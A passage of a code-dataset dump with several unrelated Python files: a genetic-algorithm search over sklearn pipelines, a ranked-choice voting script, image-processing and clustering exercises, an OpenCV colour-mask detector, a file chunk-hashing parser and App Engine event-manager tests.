population_size\n self.offspring_size = offspring_size\n self.base_primitives = None\n self.max_height = 3\n self.min_height = 1\n self.probability_mutation = 0.7\n self.probability_mate = 0.3\n self.__population = []\n self.control_pop = []\n\n def create_base_primitives_and_terminals(self):\n if self.base_primitives is None:\n self._base_primitives = []\n for model_name, model_args in preprocessing_models.items():\n model_args = deepcopy(model_args)\n # model_args['random_value_from'] = random_value_from\n model_args['type_model'] = 'preprocessing'\n model_args['name_model'] = model_name\n self._base_primitives.append(type(model_name, (), model_args))\n for model_name, model_args in selection_models.items() :\n model_args = deepcopy(model_args)\n # model_args['random_value_from'] = random_value_from\n model_args['type_model'] = 'selection'\n model_args['name_model'] = model_name\n self._base_primitives.append(type(model_name, (), model_args))\n self._base_terminals = []\n for model_name, model_args in classification_models.items() :\n model_args = deepcopy(model_args)\n # model_args['random_value_from'] = random_value_from\n model_args['type_model'] = 'classification'\n model_args['name_model'] = model_name\n self._base_terminals.append(type(model_name, (), model_args))\n\n\n\n\n\n def _setup_toolbox(self):\n creator.create('FitnessMulti', base.Fitness, weights=(-1.0, 1.0))\n creator.create('Individual', list, fitness=creator.FitnessMulti, info=tuple)\n\n self._toolbox = base.Toolbox()\n self._toolbox.register('expression', self._grow_tree)\n self._toolbox.register('individual', tools.initIterate, creator.Individual, self._toolbox.expression)\n self._toolbox.register('population', tools.initRepeat, list, self._toolbox.individual, n = self.population_size)\n self._toolbox.register('evaluation', self._evaluation_individuals)\n self._toolbox.register('select', tools.selNSGA2)\n self._toolbox.register('mate', self._mate_operator)\n self._toolbox.register('mutate', self._mutate_operator)\n # self._toolbox.register('compilation', self.expression_to_sklearn)\n\n\n def _grow_tree(self):\n add = False\n CALLABLES = (types.FunctionType, types.MethodType)\n while not add:\n expression = []\n height = random.randint(self.min_height, self.max_height)\n for i in range(1,height):\n primitive_obj = random.choice(self._base_primitives)()\n for key in [i for i in dir(primitive_obj) if not i.startswith('__') and not isinstance(getattr(primitive_obj,i), CALLABLES)]:\n setattr(primitive_obj, key, random_value_from(primitive_obj, key))\n expression.append((i, primitive_obj))\n terminal_obj = random.choice(self._base_terminals)()\n for key in [i for i in dir(terminal_obj) if not i.startswith('__') and not isinstance(getattr(terminal_obj,i), CALLABLES)]:\n t = random_value_from(terminal_obj, key)\n setattr(terminal_obj, key, t)\n expression.append((height, terminal_obj))\n count = 0\n for ind in self.control_pop:\n if self.compare_inds(ind,expression):\n count += 1\n if count <= 3:\n add = True\n self.control_pop.append(expression)\n return expression\n\n def model_to_sklearn(self, model, with_param=True):\n if with_param:\n m = model\n t = model.__dict__\n kwargs = copy(t)\n kwargs.pop('type_model')\n kwargs.pop('name_model')\n return eval(model.name_model+'(**kwargs)')\n else:\n return eval(model.name_model+'()')\n\n def individual_to_pipeline(self, ind):\n pipeline = make_pipeline(*[self.model_to_sklearn(model[1]) for model in ind])\n return pipeline\n\n def _evaluation_individuals(self, population, pipeline_list):\n for i, pipeline in enumerate(pipeline_list):\n cross_val = cross_val_score(pipeline[1], self.features, self.targets, cv=5)\n population[i].fitness.values = (len(population[i]),cross_val.mean())\n # print(pipeline[0], cross_val.mean(), sep='\\n')\n\n def _mate_operator(self, ind1, ind2):\n common_models = []\n for model_ind1 in ind1:\n for model_ind2 in ind2:\n if isinstance(model_ind1[1], type(model_ind2[1])):\n common_models.append((model_ind1, model_ind2))\n model = random.choice(common_models)\n if model[0][1].type_model != 'classification':\n param = random.choice(list(model[0][1].__dict__.keys()))\n new_ind = deepcopy(ind1)\n setattr(new_ind[model[0][0]-1][1], param, getattr(ind2[model[1][0]-1][1],param))\n return new_ind\n param_model1 = model[0][1].__dict__\n param_model2 = model[1][1].__dict__\n param_grid = {}\n for key in param_model1.keys():\n if param_model1[key] == param_model2[key]:\n param_grid[key] = [param_model1[key]]\n else:\n param_grid[key] = [param_model1[key], param_model2[key]]\n param_grid = deepcopy(param_grid)\n if len(param_grid) == 2:\n return ind1\n else:\n param_grid.pop('type_model')\n param_grid.pop('name_model')\n t = GridSearchCV(self.model_to_sklearn(model[0][1],False), param_grid, cv=5,scoring=\"accuracy\").fit(self.features, self.targets)\n new_params = t.best_params_\n new_params['type_model'] = model[0][1].type_model\n new_params['name_model'] = model[0][1].name_model\n # new_model = (model[0][0],type(model[0][1].name_model,(),new_params))\n new_ind = deepcopy(ind1)\n new_ind[model[0][0]-1][1].__dict__ = new_params\n return new_ind\n\n\n\n\n def _mutate_operator(self, ind):\n if np.random.random() <= 1/3:\n new_ind = self.replacement_mutation(ind)\n self.add_info(new_ind)\n elif np.random.random() <= 2/3:\n new_ind = self.shrink_mutation(ind)\n self.add_info(new_ind)\n else:\n new_ind = self.insert_mutation(ind)\n self.add_info(new_ind)\n return new_ind\n\n def shrink_mutation(self, ind):\n if len(ind) > 1:\n del_model = random.choice(ind[:-1])\n for i in range(del_model[0],len(ind)):\n ind[i] = (ind[i][0]-1,ind[i][1])\n ind.pop(del_model[0]-1)\n return ind\n\n def insert_mutation(self, ind):\n CALLABLES = (types.FunctionType, types.MethodType)\n if len(ind) < self.max_height:\n primitive_obj = random.choice(self._base_primitives)()\n for key in [i for i in dir(primitive_obj) if\n not i.startswith('__') and not isinstance(getattr(primitive_obj, i), CALLABLES)] :\n setattr(primitive_obj, key, random_value_from(primitive_obj, key))\n ind.insert(len(ind)-1,(len(ind), primitive_obj))\n ind[-1] = (ind[-1][0]+1,ind[-1][1])\n return ind\n\n def replacement_mutation(self, ind):\n ind_copy = deepcopy(ind)\n model = random.choice(ind_copy)\n if model[0] < len(ind) and np.random.random() <= 0.5:\n CALLABLES = (types.FunctionType, types.MethodType)\n primitive_obj = random.choice(self._base_primitives)()\n for key in [i for i in dir(primitive_obj) if\n not i.startswith('__') and not isinstance(getattr(primitive_obj, i), CALLABLES)] :\n setattr(primitive_obj, key, random_value_from(primitive_obj, key))\n ind_copy[model[0]-1] = (model[0], primitive_obj)\n else:\n params = deepcopy(model[1].__dict__)\n params.pop('type_model')\n params.pop('name_model')\n if params != {}:\n param = random.choice(list(params.keys()))\n if model[0] == len(ind_copy):\n k = random.choice(classification_models[model[1].name_model][param])\n else:\n if model[1].type_model == 'selection':\n k = random.choice(selection_models[model[1].name_model][param])\n elif model[1].type_model == 'preprocessing':\n k = random.choice(preprocessing_models[model[1].name_model][param])\n setattr(model[1], param, k)\n return ind_copy\n\n\n\n\n\n\n def add_info(self, ind):\n names = []\n for model in ind:\n names.append(model[1].name_model)\n ind.info = tuple(names)\n\n def get_random_two_ind_for_mate(self, population):\n favorable_inds = []\n for i in range(len(population)):\n for j in range(i+1,len(population)):\n a = set(population[i].info)\n b = set(population[j].info)\n if a.intersection(b) != set():\n favorable_inds.append((population[i], population[j]))\n random_inds = random.choice(favorable_inds)\n return deepcopy(random_inds)\n\n def changes(self):\n population_copy = deepcopy(self.__population)\n offspring = []\n time_table = []\n i = 0\n while i < self.population_size:\n begin_change = time()\n if np.random.random() < self.probability_mate:\n type_change = 'mate'\n new_ind = self._toolbox.mate(*self.get_random_two_ind_for_mate(population_copy))\n elif np.random.random() <= self.probability_mate + self.probability_mutation:\n type_change = 'mutate'\n new_ind = self._toolbox.mutate(random.choice(population_copy))\n stop_change = time() - begin_change\n begin_check = time()\n count = 0\n for ind in offspring:\n if self.compare_inds(ind, new_ind):\n count += 1\n for ind in self.__population :\n if self.compare_inds(ind, new_ind) :\n count += 1\n stop_check = time() - begin_check\n if count < 5 :\n time_table.append([i,type_change,stop_change,stop_check])\n offspring.append(new_ind)\n i += 1\n return offspring\n\n def compare_inds(self, ind1, ind2):\n if len(ind1) != len(ind2):\n return False\n for i in range(len(ind1)):\n if not isinstance(ind1[i][1], type(ind2[i][1])):\n return False\n return True\n\n\n\n def _pre_init_fit(self):\n self.__population = []\n self.create_base_primitives_and_terminals()\n self._setup_toolbox()\n self.__population = self._toolbox.population()\n\n def fit(self, features, targets):\n self.features = features\n self.targets = targets\n self.base_pop = []\n self._pre_init_fit()\n for ind in self.__population:\n self.add_info(ind)\n for _ in range(self.generations):\n print([_]*200)\n self.pipeline_list = [(individual, self.individual_to_pipeline(individual)) for individual in\n self.__population]\n print('Началась оценка')\n s = time()\n self._evaluation_individuals(self.__population, self.pipeline_list)\n print('Произошла оценка ',time()-s)\n if _ == 3:\n self.old_pop = deepcopy(self.__population)\n s = time()\n offspring = self.changes()\n print('Потомки созданы ',time()-s)\n # for ind in self.__population:\n # print('pop',ind)\n # for ind in offspring:\n # print('off', ind)\n self.pipeline_list = [(individual, self.individual_to_pipeline(individual)) for individual in\n offspring]\n print('Началась оценка')\n s = time()\n self._evaluation_individuals(offspring, self.pipeline_list)\n print('Произошла оценка ',time()-s)\n self.base_pop.append((deepcopy(self.__population),deepcopy(offspring)))\n self.__population[:] = self._toolbox.select(self.__population+offspring,30)\n\n\n\n\n # self.__population[:] = self._toolbox.select(self.__population,5)\n # self._mate_operator(*self.get_random_two_ind_for_mate())\n return self.__population\n\nclass GeneticClassification(GeneticBase):\n def __init__(self, generations=100, population_size=100, offspring_size=None):\n super().__init__(generations,population_size, offspring_size)\n self.type = 'Classification'\n\n\n\n\nif __name__ == '__main__' :\n df = pd.read_csv('../datasets/sonar.csv')\n # df = df.drop(df.index[150 :])\n x_train, x_test, y_train, y_test = train_test_split(df.drop(df.columns[-1], 1), df[df.columns[-1]], test_size=.2,\n random_state=42)\n print(df)\n GB = GeneticBase(population_size=30,generations=5)\n GB.fit(x_train,y_train)","sub_path":"construction_pipeline/genetic_algorithm_v1.py","file_name":"genetic_algorithm_v1.py","file_ext":"py","file_size_in_byte":14420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"399835747","text":"'''\nCreated on Oct 1, 2013\n\n@author: zhijing\n'''\n\ndef read_voter_preferences(voter_file):\n '''Takes the file and returns a dictionary where the keys are the voters and the values\n are lists of the voters' preferred candidates'''\n voter_dict = dict()\n for line in voter_file:\n voter = line.split(';')[0]\n votes=line.strip().split(';')[1:]\n voter_dict[voter] = votes\n voter_file.close()\n return voter_dict\n\ndef print_dict(title, dictionary, function = None, b=False):\n '''Prints a dictionary based on the function given'''\n items_to_print_list = sorted(dictionary.items(), key = function, reverse = b) \n print(title)\n for i in items_to_print_list:\n print(' {} -> {}'.format(i[0], i[1]))\n \n \ndef evaluate_ballot(vote_dict:dict, remaining_candidates:set):\n '''Evaluates the ballots and returns a dictionary containing the results of the ballots'''\n result_dict={candidate : 0 for candidate in remaining_candidates}\n for voter in vote_dict:\n ballot_number=0\n while True:\n if vote_dict[voter][ballot_number] in remaining_candidates:\n result_dict[vote_dict[voter][ballot_number]]+=1\n break\n else:\n ballot_number+=1\n return result_dict\n \n \ndef remaining_candidates(candidate_votes_dict):\n '''Takes dictionary of the the votes that each candidate received and returns\n the remaining candidates'''\n least_votes = min(candidate_votes_dict.values())\n remaining_candidates = set(candidate for candidate in candidate_votes_dict if candidate_votes_dict[candidate]!=least_votes)\n return remaining_candidates\n\nif __name__ == '__main__':\n while True:\n voter_file_name = input('Enter file with voter preferences:')\n #Try to make a dictionary out of the voter file\n try:\n vote_dict = read_voter_preferences(open(voter_file_name))\n #If file name crashes the graph_dict() function\n except:\n print('Not a valid file. Try again')\n else:\n print_dict('Voter Preferences', vote_dict, lambda preference: preference[1])\n break\n #candidates_left is initally a set of all the candidates on an arbitrary voter preference\n candidates_left = set(candidate for all_candidates in vote_dict.values() for candidate in all_candidates)\n ballot_number=1\n while True:\n print_dict( 'Vote count on ballot #{} with candidates (alphabetically) = {}:'.format(ballot_number,candidates_left),\n evaluate_ballot(vote_dict, candidates_left),\n lambda preference: preference[0])\n print_dict( 'Vote count on ballot #{} with candidates (numerically) = {}:'.format(ballot_number,candidates_left),\n evaluate_ballot(vote_dict, candidates_left),\n lambda preference: preference[1], True)\n candidates_left = remaining_candidates(evaluate_ballot(vote_dict, candidates_left))\n ballot_number+=1\n if len(candidates_left) == 1:\n print('The winner is: {} '.format(candidates_left))\n break\n elif len(candidates_left) == 0:\n print(' No winner: election is a tie among candidate remaining on the last ballot')\n break\n ","sub_path":"ics33/ICS33 Python Materials/test/test1/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"563173891","text":"from tkinter import filedialog,Tk\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.patches as mpatches\r\nfrom sklearn.cluster import KMeans\r\n\r\ndef rand_jitter(arr):\r\n if type(arr) != str:\r\n stdev = .001*(max(arr)-min(arr))\r\n return arr + np.random.randn(len(arr)) * stdev\r\n return arr\r\n\r\ndef Preprocessing(df,columns):\r\n pd.DataFrame(\r\n columns= columns)\r\n\r\n def handle_non_numerical_data(df):\r\n columns = df.columns.values\r\n for column in columns:\r\n text_digit_vals = {}\r\n\r\n def convert_to_int(val):\r\n return text_digit_vals[val]\r\n\r\n if df[column].dtype != np.int64 and df[column].dtype != np.float64:\r\n column_contents = df[column].values.tolist()\r\n unique_elements = set(column_contents)\r\n x = 0\r\n for unique in unique_elements:\r\n if unique not in text_digit_vals:\r\n text_digit_vals[unique] = x\r\n x += 1\r\n df[column] = list(map(convert_to_int, df[column]))\r\n return df\r\n df = handle_non_numerical_data(df)\r\n return df\r\n\r\n\r\nroot = Tk()\r\nroot.fileName = filedialog.askopenfilename(filetypes = ((\"howCode files\",\"*.csv\"),(\"All files\",\"*.*\")))\r\nroot.destroy()\r\ndf = pd.read_csv(root.fileName,delimiter=',')\r\n\r\n\r\nmenu = df.columns.values\r\nindice = 1\r\nfor i in menu:\r\n print(str(indice) + str(\"-\") + str(i))\r\n indice += 1\r\nfirst = input(\"Eixo-X:\")\r\nsecond = input(\"Eixo-Y:\")\r\nthird = input(\"Cor dos Pontos:\")\r\ncores = ['#440154','#46327E','#365C8D','#277F8E','#1FA187','#4AC16D','#A0DA39','#FCE625']\r\n##########################################################################################################\r\n\r\nif (df[df.columns[first - 1]].dtype != np.int64 and df[df.columns[first - 1]].dtype != np.float64) or \\\r\n (df[df.columns[second-1]].dtype != np.int64 and df[df.columns[second-1]].dtype != np.float64):\r\n #########################################################################################################\r\n\r\n if(df[df.columns[first-1]].dtype != np.int64 and df[df.columns[first-1]].dtype != np.float64):\r\n names = set(df[df.columns.values[first - 1]].values.tolist())\r\n x = range(len(set(df[df.columns.values[first - 1]].values.tolist())))\r\n plt.xticks(x, names)\r\n if(df[df.columns[second-1]].dtype != np.int64 and df[df.columns[second-1]].dtype != np.float64):\r\n names = set(df[df.columns.values[second - 1]].values.tolist())\r\n y = range(len(set(df[df.columns.values[second - 1]].values.tolist())))\r\n plt.yticks(y, names)\r\n #########################################################################################################\r\n df = Preprocessing(df, df.columns)\r\n\r\n x = df[df.columns[first-1]]\r\n y = df[df.columns[second-1]]\r\n z = df[df.columns[third - 1]]\r\n\r\n\r\n plt.scatter(rand_jitter(x), rand_jitter(y), alpha=0.6, s=100, c=z, marker='o')\r\n plt.title(df.columns.values[first - 1] + \" X \" + df.columns.values[second - 1])\r\n\r\n\r\nelse:\r\n x = df[df.columns[first - 1]]\r\n y = df[df.columns[second - 1]]\r\n z = df[df.columns[third - 1]]\r\n\r\n\r\n plt.scatter(rand_jitter(x), rand_jitter(y), alpha=0.6, s=100, c=z, marker='o')\r\n plt.title(df.columns.values[first - 1] + \" X \" + df.columns.values[second - 1])\r\n plt.xlabel(df.columns.values[first - 1])\r\n plt.ylabel(df.columns.values[second - 1])\r\n\r\nplt.subplots_adjust(top=0.95, bottom=0.1, left=0.11, right=0.8)\r\n\r\nif(third is not None):\r\n legenda = set(df[df.columns.values[third - 1]])\r\n legenda = sorted(legenda)\r\n\r\n\r\n vet = []\r\n x = sorted(legenda)\r\n vet.append(min(x))\r\n vet.append(x[len(x) / 8])\r\n vet.append(x[2 * len(x) / 8])\r\n vet.append(x[3 * len(x) / 8])\r\n vet.append(x[4 * len(x) / 8])\r\n vet.append(x[5 * len(x) / 8])\r\n vet.append(x[6 * len(x) / 8])\r\n vet.append(max(x))\r\n\r\n\r\n ind = 0\r\n patch = []\r\n while(ind <= len(vet) - 1):\r\n patch.append(mpatches.Patch(color = cores[ind] , label=vet[ind]))\r\n ind += 1\r\n\r\n plt.legend(handles=patch,bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\r\n\r\nw = []\r\nx1 = df[df.columns[first - 1]].tolist()\r\nx2 = df[df.columns[second - 1]].tolist()\r\nfor i in range(len(x1)):\r\n w.append([x1[i],x2[i]])\r\n\r\nn_clusters = int(input(\"Quantidade de Cluster:\"))\r\nclf = KMeans(n_clusters=n_clusters)\r\n#df = df.convert_objects(convert_numeric=True)\r\nclf.fit(w)\r\n\r\ncentroids = clf.cluster_centers_\r\nlabels = clf.labels_\r\nplt.scatter(centroids[:,0], centroids[:,1],marker = 'x',c = 'red',s = 300)\r\n\r\nplt.show()\r\n","sub_path":"IC-CC/teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"86664820","text":"import cv2\nimport os, json\nfrom enum import Enum\nimport numpy as np\n\nfrom Folder.tracedetector import TraceDetectorColor\n\nclass PaletteColor(Enum):\n UNKNOWN = 0\n GREEN = 1\n BLUE = 2\n BROWN = 3\n YELLOW = 4\n\nDEFAUT_APP_PATH = '/Users/macbook/Projects/ferrero_backup/rosher_cv'\n\n# Создаем детектор и заполняем его переменные цветами из detector_left\ndetector_left = TraceDetectorColor()\nwith open(os.path.join(DEFAUT_APP_PATH, 'resources', 'colors', 'detector_left.json'), '+rb') as f:\n payload_left = json.load(f)\n palette_main_colors_left = dict()\n for k, v in payload_left['palette_main_colors'].items():\n palette_main_colors_left[PaletteColor(int(k))] = np.array(v)\n palette_threshold_left = int(payload_left['palette_threshold'])\n palette_minor_colors_left = dict()\n for k, v in payload_left['palette_minor_colors'].items():\n palette_minor_colors_left[PaletteColor(int(k))] = v\n ignor_thresholds_left = dict()\n for k, v in payload_left['ignor_thresholds'].items():\n ignor_thresholds_left[PaletteColor(int(k))] = v\n\n detector_left.ignor_thresholds = ignor_thresholds_left\n detector_left.palette_threshold = palette_threshold_left\n detector_left.palette_main_colors = palette_main_colors_left\n detector_left.palette_minor_colors = palette_minor_colors_left\n\n detector_left.precalculate()\n detector_left.precalculate_ignor()\n\n#preprocess с перенесенными из batchmanager преобразовниями маски\ndef preprocess(source_image):\n cv2.imwrite('source.jpeg', source_image)\n dst = cv2.cvtColor(source_image, cv2.COLOR_BGR2HSV)\n cv2.imwrite('hsv.jpeg', dst)\n\n\n morph = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10))\n tmp = cv2.erode(cv2.imread('mask_erode1.jpeg', 0), morph, iterations=1)\n # cv2.imwrite('mask_erode1.jpeg', tmp)\n\n mask = cv2.bitwise_and(tmp, cv2.bitwise_not(cv2.inRange(dst, (0, 0, 195), (180, 60, 255))))\n cv2.imwrite('with_blinds.jpeg', mask)\n dst = cv2.bitwise_and(dst, dst, mask=mask)\n\n dst = np.uint8(np.float32(dst) / 10) * 10\n cv2.imwrite('after_zip.jpeg', dst)\n return dst, mask\n\n#Открытие картинки с загрязнением и обработка ее препроцессом\nstart_image = cv2.imread('1_right.png', 1)\nimg, mask = preprocess(start_image)\nsource_preprocessed_image_roi = img\npreprocessed_mask = mask\ntotal_mask = mask\nminDiff = 10000000\nminDiffClr = PaletteColor.UNKNOWN\n\n#фильтрация по minor_colors и подсчет результата\nwith open(os.path.join(DEFAUT_APP_PATH, 'resources', 'colors', 'detector_left.json'), 'rb') as f:\n payload_left = json.load(f)\n palette_bcgr_color = cv2.mean(source_preprocessed_image_roi, preprocessed_mask)[0:3]\n palette_main_colors_left = dict()\n local_mask = np.array(())\n for k, v in payload_left['palette_main_colors'].items():\n palette_main_colors_left[PaletteColor(int(k))] = np.array(v)\n for key, value in palette_main_colors_left.items():\n diff = np.linalg.norm(value - palette_bcgr_color)\n if (diff < minDiff and diff < detector_left.palette_threshold):\n minDiffClr = key\n minDiff = diff\n\n for lower, highest in detector_left.palette_minor_colors_precalculated.get(minDiffClr):\n local_mask = cv2.bitwise_not(cv2.inRange(source_preprocessed_image_roi, lower, highest))\n total_mask = cv2.bitwise_and(total_mask, local_mask)\n cv2.imwrite('local_mask.jpeg', total_mask)\n\n mask_final = cv2.erode(total_mask, detector_left._morphology_kernel, iterations=1)\n masked_res = cv2.bitwise_and(source_preprocessed_image_roi, source_preprocessed_image_roi, mask=mask_final)\n cv2.imwrite('final.jpeg', masked_res)\n res = np.sum(mask_final) / 255\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"Folder/cv2algorithm.py","file_name":"cv2algorithm.py","file_ext":"py","file_size_in_byte":4177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52748980","text":"import math as mt\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\nfrom skimage import io\nfrom scipy.signal import argrelextrema\n\n#2\nA = 1.0\nfs = 4000\nq = 8\n\ndef s(t, f):\n return A*np.sin(2*np.pi*f*t)\n\ndef probkowanie(i, f):\n arr = []\n for t in i:\n arr.append(s(t, f))\n return arr\n\nx = np.arange(0, 1, 1/fs)\nt = [20, 21, 30, 45, 50, 100, 150, 200, 250, 1000]\n\n\nfor czest in t:\n y = probkowanie(x, czest)\n plt.plot(x, y)\n plt.xlabel('t[s]')\n plt.ylabel('F(t)')\n plt.title(str(czest) + 'Hz')\n plt.show()\n\n'''\n4)\nTwierdzenie o próbkowaniu, twierdzenie Nyquista–Shannona\nSygnał ciągły może być ponownie odtworzony z sygnału dyskretnego, \njeśli był próbkowany z częstotliwością co najmniej dwa razy \nwiększą od granicznej częstotliwości swego widma.\n5)\nAliasing – nieodwracalne zniekształcenie sygnału w procesie \npróbkowania wynikające z niespełnienia założeń twierdzenia o \npróbkowaniu. Zniekształcenie objawia się obecnością w wynikowym \nsygnale składowych o błędnych częstotliwościach (aliasów).\n\n'''\n\n\n#3\nimg = io.imread('./first.png')\nchang = []\nfor i in range(3):\n chang.append(img.copy())\n\n\nplt.imshow(img)\nplt.show()\nprint(img.shape)\nprint(len(img[0,0,:]))\nrows,cols = img.shape[0:2]\n\nfor i in range(rows):\n for j in range(cols):\n chang[0][i,j, 0:3] = ((max(chang[0][i,j,0:3]) + min(chang[0][i,j,0:3])) // 3)\n\n\nfor i in range(rows):\n for j in range(cols):\n chang[1][i,j, 0:3] = (sum(chang[1][i,j,0:3]) // 3)\n\nfor i in range(rows):\n for j in range(cols):\n chang[2][i,j, 0:3] = (0.21*chang[2][i,j,0]) + (0.72*chang[2][i,j,1]) + (0.07*chang[2][i,j,2])\n\n\nfig, axs = plt.subplots(3)\nfig.suptitle('Skala szarosci')\nfor i in range(3):\n axs[i].imshow(chang[i])\nplt.show()\n\n\nfig, axs = plt.subplots(3)\nfig.suptitle('Histogramy')\nfor i in range(3):\n histogram, bin_edges = np.histogram(chang[i], bins=256)\n axs[i].plot(bin_edges[0:-1], histogram)\n\nplt.show()\n\nhistogram, bin_edges = np.histogram(chang[1], bins=16)\nplt.plot(bin_edges[0:-1], histogram)\nplt.show()\n\nnew = bin_edges.mean()\nimg[:,:,0:3] = img[:,:,0:3] * new\nplt.imshow(img)\nplt.show()\nhistogram, bin_edges = np.histogram(img, bins=256)\nplt.plot(bin_edges[0:-1], histogram)\nplt.show()\n\n#4\nfig, axs = plt.subplots(3)\n\nimg = io.imread('./second.jpg')\naxs[0].imshow(img)\n\nrows,cols = img.shape[0:2]\n\ncp=img.copy()\nfor i in range(rows):\n for j in range(cols):\n cp[i,j, 0:3] = (0.21*cp[i,j,0]) + (0.72*cp[i,j,1]) + (0.07*cp[i,j,2])\naxs[1].imshow(cp)\n\n_ = axs[2].hist(cp[:, :, 0:3].ravel(), bins = 256, color = 'red', alpha = 0.5)\n_ = plt.xlabel('Intensity Value')\n_ = plt.ylabel('Count')\n_ = plt.legend(['Total', 'Red_Channel', 'Green_Channel', 'Blue_Channel'])\nplt.show()\n\npicture = Image.open(\"./second.jpg\")\n\ndef prog(histogram):\n return sum(histogram[1]) // len(histogram[1])\n\nhistogram = np.histogram(picture)\npr = prog(histogram)\n\n\nprint(pr)\npr = pr * 3\n\nfor i in range(rows):\n for j in range(cols):\n if pr > sum(picture.getpixel( (i,j) )):\n picture.putpixel( (i,j), (0,0,0))\n else:\n picture.putpixel( (i,j), (256,256,256))\nplt.imshow(picture)\nplt.show()\n\n\npicture = Image.open(\"./second.jpg\")\nfor i in range(rows):\n for j in range(cols):\n if pr < sum(picture.getpixel( (i,j) )):\n picture.putpixel( (i,j), (256,256,256))\nplt.imshow(picture)\nplt.show()\n","sub_path":"dyskretyzacja,_kwantyzacja_binaryzacja/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"374153778","text":"#FileParser.py -- read a file from user specific input. Each time read user specific chunk, calculate the hash, count on the hit of each hash,\n#and store the result into a user specific file\n\n#example:\n#python FileParser.py test.doc 8 testDB\n# test.doc: file to be read\n# 8: read 8k every time\n# testDB: save file info to testDB\n\nimport FileReader\nimport sys\nimport os\nimport hashlib\nimport timeit\nimport numpy as np\nimport pickle\nfrom pathlib import Path\n\n\n#main:\nif len(sys.argv) == 1:\n print(' Usage: read a file, parse it, and store parse info into a file\\n\\\n Example: python FileReader.py test.doc 8192 1000 testDB\\n\\\n test.doc: file to be read\\n\\\n 8192: read 8k bytes every time\\n\\\n 1000: start offset when reading\\n\\\n testDB: save parse info to testDB')\n sys.exit(0)\n\nreader = FileReader.FileReader()\n\nreader.fileToBeRead = sys.argv[1]\nreader.fileToBeSaved = sys.argv[4]\nreader.fileSize = os.path.getsize(sys.argv[1])\nreader.chunkSize = int(sys.argv[2])\nreader.readStartPos = int(sys.argv[3])\nreader.fileHash = np.zeros(reader.tableSize, dtype=np.uint32)\n#use this table to store offset of each hit in the fileHash table\nreader.offsetTable = []\nfor i in range(0, reader.tableSize):\n reader.offsetTable.append([])\n\n#open file as binary:\nf = open(reader.fileToBeRead, \"rb\")\n\n#jump to start position:\ntempHex = [f.read(1) for i in range(0, reader.readStartPos)]\n\nbytesChunk = np.fromstring(f.read(reader.chunkSize), dtype=np.uint8)\n\ni = 0 \ntotalSum = 0\n\nstart = timeit.default_timer()\nwhile bytesChunk.size != 0:\n tempHash = bytesChunk.sum() % reader.tableSize\n reader.fileHash[tempHash] += 1\n\n #this is not the real offset, but it can be used to calculate offset:\n reader.offsetTable[tempHash].append(i)\n\n bytesChunk = np.fromstring(f.read(reader.chunkSize), dtype=np.uint8) #use numpy to do summation is much faster than ordinary array\n i+=1\nstop = timeit.default_timer()\n\nprint(\"loop: \" + str(i))\nprint(\"min:\" + str(reader.fileHash.min()) + \" max:\" + str(reader.fileHash.max()) + \" at index:\" + str(reader.fileHash.argmax()) +\" mean:\" + str(reader.fileHash.mean()))\nprint(\"cost time: \")\nprint(stop-start)\n\n#save FileReader to file:\nif Path(reader.fileToBeSaved).is_file():\n os.remove(reader.fileToBeSaved)\n\nwith open(reader.fileToBeSaved, 'wb') as pickler:\n pickle.dump(reader, pickler, pickle.HIGHEST_PROTOCOL)\n\nf.close()\n","sub_path":"FileParser.py","file_name":"FileParser.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"477452250","text":"__author__ = 'pdiazv'\n\nfrom test_utils import enginetest, stubs\nfrom repository.managers import eventmanager\nfrom repository.models import Location, Athlete\nfrom repository.test_repository.stubs import MockValidator\n\nclass TestEventManager(enginetest.BaseEngineTestCase):\n\n def setUp(self):\n self.setUpTestbed()\n\n self.validator = MockValidator(True)\n self.manager = eventmanager.EventManager(self.validator)\n location = Location(name='TestLoc1')\n self.location_key = location.put()\n\n athlete = Athlete(name='Pedro', location=self.location_key, source='fb', source_id='16234', gender='male')\n self.athlete_key = athlete.put()\n\n def test_add_single_event(self):\n event = self.getEvent('Hawthorn Trail')\n\n key = self.manager.add(self.athlete_key, event)\n result = key.get()\n\n self.validateEvent(result, event)\n\n def test_add_single_event_validation_fails(self):\n event = self.getEvent('Hawthorn Trail')\n result = stubs.MockResult()\n\n self.validator.setError('InvalidEvent')\n key = self.manager.add(self.athlete_key, event, result)\n\n self.assertIsNone(key)\n self.assertTrue(result.errorCodeFound('InvalidEvent'))\n\n def test_modify_event(self):\n event = self.getEvent('Hawthorn Trail')\n new_event = self.getEvent('New Name', 'New Descr', '10/08/2015', '1.45,9.789')\n\n parent_key = self.athlete_key.get().location\n\n key = self.manager.add(self.athlete_key, event)\n\n new_event['id'] = str(key.id())\n result = self.manager.update(parent_key, new_event).get()\n\n self.validateEvent(result, new_event)\n\n def test_modify_event_validation_fails(self):\n event = self.getEvent('Hawthorn Trail')\n new_event = self.getEvent('New Name', 'New Descr', '10/08/2015', '1.45,9.789')\n\n parent_key = self.athlete_key.get().location\n key = self.manager.add(self.athlete_key, event)\n\n self.validator.set_status(False)\n new_event['id'] = str(key.id())\n result = self.manager.update(parent_key, new_event)\n\n self.assertIsNone(result)\n\n def test_list_events_by_athlete(self):\n event1 = self.getEvent('event1')\n event2 = self.getEvent('event2')\n\n self.manager.add(self.athlete_key, event1)\n self.manager.add(self.athlete_key, event2)\n\n result = self.manager.listByAthlete(self.athlete_key)\n\n self.assertEqual(2, len(result))\n self.assertEqual('event1', result[0].name)\n self.assertEqual('event2', result[1].name)\n\n def test_list_events_by_location(self):\n event1 